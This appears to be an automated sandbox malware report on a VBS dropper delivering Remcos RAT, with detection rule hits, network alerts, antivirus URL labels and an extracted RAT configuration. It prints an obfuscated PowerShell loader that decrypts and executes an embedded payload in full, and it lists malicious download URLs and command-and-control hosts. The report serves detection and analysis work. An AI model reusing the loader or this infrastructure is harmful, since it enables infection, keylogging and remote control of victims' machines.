kG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 5684, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 7060, ProcessName: wscript.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 5684, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 7060, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", ProcessId: 3500, ProcessName: wscript.exe
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 5684, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem", ProcessId: 5792, ProcessName: RegAsm.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", ProcessId: 3500, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-07-27T13:31:04.851966+0200
                  SID:2032777
                  Source Port:57484
                  Destination Port:49706
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-27T13:31:01.367604+0200
                  SID:2049038
                  Source Port:80
                  Destination Port:49704
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T13:31:03.293177+0200
                  SID:2032776
                  Source Port:49706
                  Destination Port:57484
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-27T13:31:24.727754+0200
                  SID:2012510
                  Source Port:443
                  Destination Port:49719
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T13:31:02.365590+0200
                  SID:2020424
                  Source Port:80
                  Destination Port:49705
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-07-27T13:31:24.608086+0200
                  SID:2803305
                  Source Port:49719
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-27T13:33:08.503059+0200
                  SID:2032777
                  Source Port:57484
                  Destination Port:49706
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-27T13:31:16.345911+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49712
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T13:31:54.656391+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49721
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T13:31:17.499992+0200
                  SID:2012510
                  Source Port:443
                  Destination Port:49711
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T13:31:06.094770+0200
                  SID:2803304
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-27T13:31:00.255775+0200
                  SID:2047750
                  Source Port:80
                  Destination Port:49704
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmAvira URL Cloud: Label: malware
                  Source: https://asociatiatraditiimaria.ro/os/transportment.pfmAvira URL Cloud: Label: malware
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0Avira URL Cloud: Label: malware
                  Source: iwarsut775laudrye2.duckdns.orgAvira URL Cloud: Label: malware
                  Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
                  Source: https://new.quranushaiqer.org.saAvira URL Cloud: Label: malware
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmlAvira URL Cloud: Label: malware
                  Source: http://104.168.45.34/59/LMTS.txtAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for domain / URL
                  Source: asociatiatraditiimaria.roVirustotal: Detection: 14%Perma Link
                  Source: iwarsut775laudrye2.duckdns.orgVirustotal: Detection: 19%Perma Link
                  Source: new.quranushaiqer.org.saVirustotal: Detection: 17%Perma Link
                  Source: https://asociatiatraditiimaria.ro/feed/Virustotal: Detection: 13%Perma Link
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmVirustotal: Detection: 17%Perma Link
                  Source: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767Virustotal: Detection: 13%Perma Link
                  Source: http://198.46.176.133Virustotal: Detection: 13%Perma Link
                  Source: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1Virustotal: Detection: 13%Perma Link
                  Source: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=Virustotal: Detection: 13%Perma Link
                  Source: https://asociatiatraditiimaria.roVirustotal: Detection: 5%Perma Link
                  Source: iwarsut775laudrye2.duckdns.orgVirustotal: Detection: 19%Perma Link
                  Source: http://198.46.176.133/Upload/vbs.jpegVirustotal: Detection: 19%Perma Link
                  Source: https://asociatiatraditiimaria.ro/comments/feed/Virustotal: Detection: 13%Perma Link
                  Source: https://asociatiatraditiimaria.ro/wp-json/Virustotal: Detection: 13%Perma Link
                  Source: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2Virustotal: Detection: 13%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: createdthingstobefrankwithmeeverywhere.gIF.vbsVirustotal: Detection: 18%Perma Link
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00433837
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_bcd06fae-d

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004074FD _wcslen,CoGetObject,4_2_004074FD
                  Source: unknownHTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.5:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
